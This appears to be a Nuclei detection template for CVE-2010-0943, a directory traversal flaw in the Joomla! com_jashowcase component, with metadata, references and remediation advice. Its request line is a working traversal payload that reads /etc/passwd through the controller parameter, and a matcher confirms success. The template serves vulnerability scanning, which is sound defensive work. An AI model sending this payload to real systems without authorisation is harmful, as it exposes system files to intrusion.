42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
id: CVE-2010-0943
|
|
|
|
info:
|
|
name: Joomla! Component com_jashowcase - Directory Traversal
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
|
remediation: |
|
|
Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/11090
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-0943
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55512
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2010-0943
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01155
|
|
epss-percentile: 0.83325
|
|
cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: joomlart
|
|
product: com_jashowcase
|
|
tags: cve2010,joomla,lfi,edb,cve
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022027a819e7492dea2476ec4541a09f0b6fedece356216b38e674d5dfef69a4cf2502205a8c76407892bdca82066acd688b9ba77d90ff3dd080a6ce709998b432799c95:922c64590222798bb761d5b6d8e72950 |